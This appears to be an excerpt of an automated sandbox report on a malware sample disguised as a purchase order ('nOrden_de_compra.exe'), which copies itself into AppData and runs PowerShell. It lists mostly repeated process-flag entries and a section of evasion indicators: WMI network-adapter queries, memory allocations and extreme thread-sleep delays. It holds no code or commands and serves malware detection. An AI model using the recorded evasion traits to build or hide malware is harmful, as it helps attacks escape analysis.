                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe    Process information set: NOOPENFILEERRORBOX (63 identical entries)
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe    Process information set: NOOPENFILEERRORBOX (126 identical entries)
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match | File source: Process Memory Space: nOrden_de_compra.exe PID: 5724, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: nNdsLvHyWi.exe PID: 6640, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory allocated: 2AA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory allocated: 2CA0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory allocated: 2AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory allocated: 7FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory allocated: 8FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory allocated: 9190000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory allocated: A190000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory allocated: 2CD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory allocated: 2E70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Memory allocated: 4E70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Memory allocated: F50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Memory allocated: 27A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Memory allocated: 47A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Memory allocated: 75C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Memory allocated: 85C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Memory allocated: 8770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Memory allocated: 9770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Memory allocated: DE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Memory allocated: 28B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Memory allocated: 48B0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4289
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4320
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Window / User API: threadDelayed 3288
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Window / User API: threadDelayed 6560
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Window / User API: threadDelayed 982
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Window / User API: threadDelayed 8870
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 988 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1808 | Thread sleep count: 4289 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1808 | Thread sleep count: 171 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5412 | Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3384 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5980 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -27670116110564310s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5352 | Thread sleep count: 3288 > 30
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99890s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5352 | Thread sleep count: 6560 > 30
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99781s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99671s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99562s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99453s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99342s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99234s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99125s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99015s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98902s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98796s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98686s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98578s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98468s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98359s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98250s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98140s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98031s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -97921s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -97812s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -97702s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -97593s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -97484s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -97375s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -97265s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -97156s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -97046s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -96937s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -96828s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -96718s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -96609s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -96500s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -96390s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -96281s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -96171s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -96062s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -95953s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99968s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99854s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99749s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99640s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99531s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99421s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99312s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99203s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -99093s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98984s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98875s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe TID: 5316 | Thread sleep time: -98765s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 3524 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -21213755684765971s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 5308 | Thread sleep count: 982 > 30
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 5308 | Thread sleep count: 8870 > 30
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99765s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244 | Thread sleep time: -99328s >= -30000s
